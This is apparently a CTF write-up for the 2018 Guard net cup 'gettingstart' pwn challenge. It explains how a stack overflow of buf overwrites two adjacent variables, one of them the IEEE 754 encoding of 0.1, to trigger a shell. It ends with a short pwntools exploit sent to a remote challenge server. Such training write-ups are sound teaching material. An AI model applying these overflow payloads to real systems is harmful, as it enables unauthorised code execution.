Guard net cup_2018_gettingstart
- Routine checks first: it is a 64-bit binary with every protection enabled except RELRO.
- Run it once to get a feel for what it does.
- Load it in 64-bit IDA.
When v5 == 0x7FFFFFFFFFFFFFFFLL and v6 == 0.1 are both satisfied, the program spawns a shell. Look at the stack layout.
Work out the offsets: buf sits below v5 and v6 on the stack, so the read into buf can overwrite both of them.
This challenge is not hard. v5 can be written as the integer directly; the only thing to watch is how 0.1 is laid out in memory. Integers are stored in two's-complement form, and floating-point values are stored according to the IEEE 754 standard; readers who are interested can look up how to compute the encoding by hand. I found a small tool on another blog that computes the in-memory representation of a value.
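Instead of relying on an external converter, the encodings can be computed with Python's struct module. The block below is an added example, not part of the original writeup; it shows the two's-complement encoding of a signed integer, the IEEE 754 binary64 bit pattern of 0.1 (which is where 0x3FB999999999999A comes from), the different pattern a 32-bit float would produce, and a helper that builds the 24-byte-padding + v5 + v6 payload and reads the two values back out of it. The padding length of 24 and the target values are taken from the challenge; the function names are my own.

```python
import struct


def int64_to_u64(x: int) -> int:
    """Two's-complement encoding of a signed 64-bit integer, as an unsigned qword."""
    return int.from_bytes(struct.pack("<q", x), "little")


def double_to_u64(x: float) -> int:
    """IEEE 754 binary64 bit pattern of x, read back as a little-endian qword.

    This is exactly the 8 bytes that sit in the stack slot of a C `double`."""
    return int.from_bytes(struct.pack("<d", x), "little")


def u64_to_double(bits: int) -> float:
    """Inverse of double_to_u64: reinterpret a qword as a double."""
    return struct.unpack("<d", bits.to_bytes(8, "little"))[0]


def float_to_u32(x: float) -> int:
    """IEEE 754 binary32 bit pattern; included to show that a C `float`
    compare would need a different (and shorter) constant than a `double`."""
    return int.from_bytes(struct.pack("<f", x), "little")


def build_payload(pad_len: int, v5: int, v6: float) -> bytes:
    """Padding up to v5, then v5 as a qword, then v6 as a binary64 double.

    struct.pack("<d", v6) yields the same bytes as p64(double_to_u64(v6))
    in pwntools, without having to compute the hex constant by hand."""
    return b"a" * pad_len + struct.pack("<Q", v5) + struct.pack("<d", v6)


def parse_payload(payload: bytes, pad_len: int):
    """Read v5 (signed, like the `LL` literal in the decompiler) and v6 back
    from the payload, the way the overflowed stack frame would see them."""
    v5 = struct.unpack_from("<q", payload, pad_len)[0]
    v6 = struct.unpack_from("<d", payload, pad_len + 8)[0]
    return v5, v6


if __name__ == "__main__":
    # Target values from the challenge's check.
    print(hex(int64_to_u64(-1)))                 # two's complement of -1
    print(hex(double_to_u64(0.1)))               # bit pattern the exploit must write
    print(hex(float_to_u32(0.1)))                # what a 32-bit float would have been
    payload = build_payload(24, 0x7FFFFFFFFFFFFFFF, 0.1)
    print(payload.hex(), parse_payload(payload, 24))
```

Note that 0.1 is not exactly representable, so the comparison in the binary is really against the nearest binary64 value; writing the bit pattern produced by the same encoding is what makes `v6 == 0.1` hold.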
exp
from pwn import *

p = remote("node3.buuoj.cn", 27198)

# 24 bytes of filler to reach v5, then v5 and the binary64 encoding of 0.1 for v6.
payload = b'a' * 24 + p64(0x7FFFFFFFFFFFFFFF) + p64(0x3FB999999999999A)
p.sendline(payload)
p.interactive()